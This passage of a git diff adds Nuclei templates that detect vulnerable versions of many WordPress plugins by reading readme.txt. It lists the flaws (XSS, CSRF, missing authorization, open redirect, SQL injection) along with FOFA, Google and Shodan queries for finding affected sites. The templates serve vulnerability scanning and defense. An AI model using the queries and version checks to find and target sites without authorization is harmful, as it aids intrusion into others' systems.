unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/50167c70-40f3-4beb-9171-ece066d2c3de?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-54226 + metadata: + fofa-query: "wp-content/plugins/country-blocker/" + google-query: inurl:"/wp-content/plugins/country-blocker/" + shodan-query: 'vuln:CVE-2024-54226' + tags: cve,wordpress,wp-plugin,country-blocker,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/country-blocker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "country-blocker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54227.yaml b/poc/cve/CVE-2024-54227.yaml new file mode 100644 index 0000000000..fb4775ae24 --- /dev/null +++ b/poc/cve/CVE-2024-54227.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54227-43c41feaa9d58f8efc0b1ce3261306a2 + +info: + name: > + Minimum and Maximum Quantity for WooCommerce <= 2.0.0 - Missing Authorization + author: topscoder + severity: high + description: > + The Minimum and Maximum Quantity for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.0.0. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22738841-b25c-4519-9b94-e64a3fdf6cea?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-54227 + metadata: + fofa-query: "wp-content/plugins/min-and-max-quantity-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/min-and-max-quantity-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-54227' + tags: cve,wordpress,wp-plugin,min-and-max-quantity-for-woocommerce,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/min-and-max-quantity-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "min-and-max-quantity-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54228.yaml b/poc/cve/CVE-2024-54228.yaml new file mode 100644 index 0000000000..79474b1ae3 --- /dev/null +++ b/poc/cve/CVE-2024-54228.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54228-d3544c5336366a751ac82c436ef933e3 + +info: + name: > + Wot Elementor Widgets <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Wot Elementor Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fdb1314-5979-42bb-96dd-cc1648283c4e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54228 + metadata: + fofa-query: "wp-content/plugins/wot-elementor-widgets/" + google-query: inurl:"/wp-content/plugins/wot-elementor-widgets/" + shodan-query: 'vuln:CVE-2024-54228' + tags: cve,wordpress,wp-plugin,wot-elementor-widgets,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wot-elementor-widgets/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wot-elementor-widgets" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54230.yaml b/poc/cve/CVE-2024-54230.yaml new file mode 100644 index 0000000000..329ab34eff --- /dev/null +++ b/poc/cve/CVE-2024-54230.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54230-421f5bcea4b13be62429fcb8ab498858 + +info: + name: > + Unlock Addons for Elementor <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Unlock Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/62f1635a-cb94-4c5e-a1f6-90a1eeb38968?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54230 + metadata: + fofa-query: "wp-content/plugins/unlock-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/unlock-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-54230' + tags: cve,wordpress,wp-plugin,unlock-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/unlock-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "unlock-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54231.yaml b/poc/cve/CVE-2024-54231.yaml new file mode 100644 index 0000000000..c9154d0b85 --- /dev/null +++ b/poc/cve/CVE-2024-54231.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54231-427de4f60398b7e1078355b6618fa118 + +info: + name: > + Ni WooCommerce Order Export <= 3.1.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Ni WooCommerce Order Export plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/36510335-df4c-473d-8091-ba7e070525bf?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-54231 + metadata: + fofa-query: "wp-content/plugins/ni-woocommerce-order-export/" + google-query: inurl:"/wp-content/plugins/ni-woocommerce-order-export/" + shodan-query: 'vuln:CVE-2024-54231' + tags: cve,wordpress,wp-plugin,ni-woocommerce-order-export,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ni-woocommerce-order-export/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ni-woocommerce-order-export" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54232.yaml b/poc/cve/CVE-2024-54232.yaml new file mode 100644 index 0000000000..8cde7512f6 --- /dev/null +++ b/poc/cve/CVE-2024-54232.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54232-43abed5835eaafea250948b708d95e51 + +info: + name: > + RRAddons for Elementor <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The RRAddons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdeb9625-65fa-42bd-9708-7090691aae45?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54232 + metadata: + fofa-query: "wp-content/plugins/rrdevs-for-elementor/" + google-query: inurl:"/wp-content/plugins/rrdevs-for-elementor/" + shodan-query: 'vuln:CVE-2024-54232' + tags: cve,wordpress,wp-plugin,rrdevs-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rrdevs-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rrdevs-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54247.yaml b/poc/cve/CVE-2024-54247.yaml new file mode 100644 index 0000000000..96d8418847 --- /dev/null +++ b/poc/cve/CVE-2024-54247.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54247-32dd452fd1db8cb528bb367644d98408 + +info: + name: > + ABCBiz Addons for Elementor <= 2.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The ABCBiz Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/688c04b5-e5fe-4ddf-b253-2418149d9aba?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54247 + metadata: + fofa-query: "wp-content/plugins/abcbiz-addons/" + google-query: inurl:"/wp-content/plugins/abcbiz-addons/" + shodan-query: 'vuln:CVE-2024-54247' + tags: cve,wordpress,wp-plugin,abcbiz-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/abcbiz-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "abcbiz-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54250.yaml b/poc/cve/CVE-2024-54250.yaml new file mode 100644 index 0000000000..7b5238b638 --- /dev/null +++ b/poc/cve/CVE-2024-54250.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54250-80229f33352eda0e4db54b51c9f141a7 + +info: + name: > + Prodigy Commerce <= 3.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Prodigy Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14b10f8e-37dd-4a34-87da-c09fdb8e09b3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-54250 + metadata: + fofa-query: "wp-content/plugins/prodigy-commerce/" + google-query: inurl:"/wp-content/plugins/prodigy-commerce/" + shodan-query: 'vuln:CVE-2024-54250' + tags: cve,wordpress,wp-plugin,prodigy-commerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/prodigy-commerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "prodigy-commerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54251.yaml b/poc/cve/CVE-2024-54251.yaml new file mode 100644 index 0000000000..76a67dc4aa --- /dev/null +++ b/poc/cve/CVE-2024-54251.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54251-4675c5cbd2d4490266ac6406a9506a12 + +info: + name: > + Prodigy Commerce <= 3.0.9 - Missing Authorization + author: topscoder + severity: low + description: > + The Prodigy Commerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.0.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dea4a7f4-e075-45d9-bf71-f411f4ce30df?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-54251 + metadata: + fofa-query: "wp-content/plugins/prodigy-commerce/" + google-query: inurl:"/wp-content/plugins/prodigy-commerce/" + shodan-query: 'vuln:CVE-2024-54251' + tags: cve,wordpress,wp-plugin,prodigy-commerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/prodigy-commerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "prodigy-commerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54253.yaml b/poc/cve/CVE-2024-54253.yaml new file mode 100644 index 0000000000..f000a3109e --- /dev/null +++ b/poc/cve/CVE-2024-54253.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54253-b4f4e0a053f49fd713057ccba10c41ab + +info: + name: > + 140+ Widgets | Xpro Addons For Elementor – FREE <= 1.4.6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The 140+ Widgets | Xpro Addons For Elementor – FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.4.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/039a9e3d-0e88-4eae-9537-58682aaf7b10?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54253 + metadata: + fofa-query: "wp-content/plugins/xpro-elementor-addons/" + google-query: inurl:"/wp-content/plugins/xpro-elementor-addons/" + shodan-query: 'vuln:CVE-2024-54253' + tags: cve,wordpress,wp-plugin,xpro-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/xpro-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "xpro-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.6.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54255.yaml b/poc/cve/CVE-2024-54255.yaml new file mode 100644 index 0000000000..8ca4675797 --- /dev/null +++ b/poc/cve/CVE-2024-54255.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54255-22f20fe5fd8f58ffc816fe1d69d3dfea + +info: + name: > + Login Widget With Shortcode <= 6.1.2 - Open Redirect + author: topscoder + severity: medium + description: > + The Login Widget With Shortcode plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 6.1.2. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9ce819fa-5c94-4116-9361-1de24619c27b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-54255 + metadata: + fofa-query: "wp-content/plugins/login-sidebar-widget/" + google-query: inurl:"/wp-content/plugins/login-sidebar-widget/" + shodan-query: 'vuln:CVE-2024-54255' + tags: cve,wordpress,wp-plugin,login-sidebar-widget,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-sidebar-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-sidebar-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-54260.yaml b/poc/cve/CVE-2024-54260.yaml new file mode 100644 index 0000000000..413ee432a1 --- /dev/null +++ b/poc/cve/CVE-2024-54260.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54260-174ca9070168a4655d9261554d70d98e + +info: + name: > + News Kit Elementor Addons <= 1.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The News Kit Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/df96f58a-bc6e-47e7-a465-4aebdb264512?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-54260 + metadata: + fofa-query: "wp-content/plugins/news-kit-elementor-addons/" + google-query: inurl:"/wp-content/plugins/news-kit-elementor-addons/" + shodan-query: 'vuln:CVE-2024-54260' + tags: cve,wordpress,wp-plugin,news-kit-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/news-kit-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "news-kit-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7982.yaml b/poc/cve/CVE-2024-7982.yaml new file mode 100644 index 0000000000..27b66bba0e --- /dev/null +++ b/poc/cve/CVE-2024-7982.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7982-fc7896dc545f4f6e317ed308a0e8b1e6 + +info: + name: > + Registrations for the Events Calendar – Event Registration Plugin <= 2.12.3 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The Registrations for the Events Calendar – Event Registration Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the first and last name parameters in all versions up to, and including, 2.12.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f05a55ba-8068-4f6e-a7b1-f3d5d17e54ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-7982 + metadata: + fofa-query: "wp-content/plugins/registrations-for-the-events-calendar/" + google-query: inurl:"/wp-content/plugins/registrations-for-the-events-calendar/" + shodan-query: 'vuln:CVE-2024-7982' + tags: cve,wordpress,wp-plugin,registrations-for-the-events-calendar,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/registrations-for-the-events-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "registrations-for-the-events-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8157.yaml b/poc/cve/CVE-2024-8157.yaml new file mode 100644 index 0000000000..1db2a2e5b4 --- /dev/null +++ b/poc/cve/CVE-2024-8157.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8157-6e2ff7bf6e39d3c1283ab25439378a24 + +info: + name: > + Alphabetical List <= 1.0.3 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The Alphabetical List plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the 'alphabetical-list' page. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2952a7bf-ccbf-46e0-ac7e-54576f413f66?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8157 + metadata: + fofa-query: "wp-content/plugins/alphabetical-list/" + google-query: inurl:"/wp-content/plugins/alphabetical-list/" + shodan-query: 'vuln:CVE-2024-8157' + tags: cve,wordpress,wp-plugin,alphabetical-list,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/alphabetical-list/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "alphabetical-list" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8378.yaml b/poc/cve/CVE-2024-8378.yaml new file mode 100644 index 0000000000..a88f69abdd --- /dev/null +++ b/poc/cve/CVE-2024-8378.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8378-74a7d87cee245c48a3bf9a30ec708ca3 + +info: + name: > + Safe SVG <= 2.2.5 - Authenticated (Author+) Stored Cross-Site Scripting via SVG + author: topscoder + severity: low + description: > + The Safe SVG plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.2.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5d42dc6-047f-45ff-9a7a-5a7738f7dcb5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-8378 + metadata: + fofa-query: "wp-content/plugins/safe-svg/" + google-query: inurl:"/wp-content/plugins/safe-svg/" + shodan-query: 'vuln:CVE-2024-8378' + tags: cve,wordpress,wp-plugin,safe-svg,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "safe-svg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8444.yaml b/poc/cve/CVE-2024-8444.yaml new file mode 100644 index 0000000000..06224e03ae --- /dev/null +++ b/poc/cve/CVE-2024-8444.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8444-6574252782a3a4b5b570683a6ba1f844 + +info: + name: > + Download Manager <= 3.2.99 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm_login_form' shortcode in all versions up to, and including, 3.2.99 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/df93727c-2d2f-4e13-8c89-3ffb93975180?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8444 + metadata: + fofa-query: "wp-content/plugins/download-manager/" + google-query: inurl:"/wp-content/plugins/download-manager/" + shodan-query: 'vuln:CVE-2024-8444' + tags: cve,wordpress,wp-plugin,download-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/download-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "download-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.99') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8625.yaml b/poc/cve/CVE-2024-8625.yaml new file mode 100644 index 0000000000..a0096554f7 --- /dev/null +++ b/poc/cve/CVE-2024-8625.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8625-d78c80da7bee3e0e6c7436c5df622773 + +info: + name: > + TS Poll – Survey, Versus Poll, Image Poll, Video Poll <= 2.3.9 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The TS Poll – Survey, Versus Poll, Image Poll, Video Poll plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3d7b73f4-e52f-40bd-9865-de994cd8d610?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-8625 + metadata: + fofa-query: "wp-content/plugins/poll-wp/" + google-query: inurl:"/wp-content/plugins/poll-wp/" + shodan-query: 'vuln:CVE-2024-8625' + tags: 